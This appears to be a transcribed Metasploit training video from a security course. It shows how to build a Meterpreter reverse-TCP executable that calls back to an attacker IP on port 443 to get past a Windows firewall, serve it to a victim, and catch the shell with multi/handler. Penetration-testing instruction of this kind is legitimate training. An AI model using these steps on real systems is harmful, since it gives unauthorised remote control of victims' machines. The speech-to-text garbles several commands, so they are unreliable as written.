Hello, welcome to Insectix, Information Security Technologies training on penetration testing with Metasploit. In the last video, we have successfully created a binary payload and we have gained the access over the victim machine. So, in that particular stage 1 exploitation, there is no antivirus, the system is not patched, even there is a absence of the firewall. But coming to the stage 2, we are having the same lab setup, but here the firewall is enabled. Now let us see how can we exploit this particular machine when the firewall is enabled. Okay, so antivirus is absent, updates are absent, but firewall is present. So we are using the same method, but here we are changing only the port option, that is to 443, because most of the operating systems, they do allow this particular common ports like 21, 22, 80, 443. So that's why I'm going to use this particular port, that is 443, and we shall use the same settings for multi-handler exploiter, okay, for listening for the incoming connections. What we will do is we shall manually turn on this port, okay, and we shall enable the firewall using the command line arguments. So to enable the firewall, we can use command line arguments over the CMD. First of all, let us check the status of the firewall, whether it is running or not. To do that, you need to issue the following command, that is netsh firewall show op mode, okay, which will show the operation mode of this particular firewall, and you can see that this particular operation mode is disabled, right? Let us check it manually now. Go to the control panel and go to the security center. Okay, you can see the status, it's turned off. Now what we will do is we shall try to enable the firewall. Okay, to do that, give the following command netsh firewall set op mode equal to enable, which will enable the firewall. Okay, so you can see here the firewall is turned on. Let me close this, even this thing also. Now let us create the backdoor MSF payload Windows meter reverse underscore TCP lhost is equal to the attacker's IP, that is 192.168.159.134, and the L port. Here we are using the port number 443, right? 443, and let us save this file. Let it be 443.exe. Sorry guys, it is 443, and let me save this into our web server so that we can easily access it. Okay, MSF payload Windows meter interpreter reverse TCP, lhost is attacker's IP, and the port is 443, and we are creating we are creating the executable file. Okay. Dot 443.exe, which will save in the var ww. And on the other hand, we shall enable the multi-handler exploit. Use exploit multi-handler and provide the same settings, that is Windows meter interpreter reverse underscore TCP, and set the L port, which is 443, and check the options. Okay, so we need to assign this particular L host, right? Okay, so let's do this. Set L host. What is the L host here? That is attacker's IP 192.168.159.134. Okay, so everything is assigned properly, and even it has created an executable application with the name 443.exe. Now let us start our web service. Okay, it's running. Open up. It is 443.exe. Save this, desktop, close. Okay, on the attacker side, do the exploitation, okay, which will start listening. Whenever the victim opens this particular exe application, we will get a reverse connection back to the Kali Linux machine. Okay, so let's open up, click on run, back to the attacker machine. You can see we got a meterpreter session which is open. Let me open up the shell and let me sh firewall show op mode. Okay, so you can see even in the presence of the firewall we have successfully gained the access. Okay, so the victim himself has opened this particular malicious application, right? And this particular application has been created with the following settings, where we have created with the L port as 443, where most of the system administrators, they do enable this particular port, right? That's all for this video. Thanks for watching.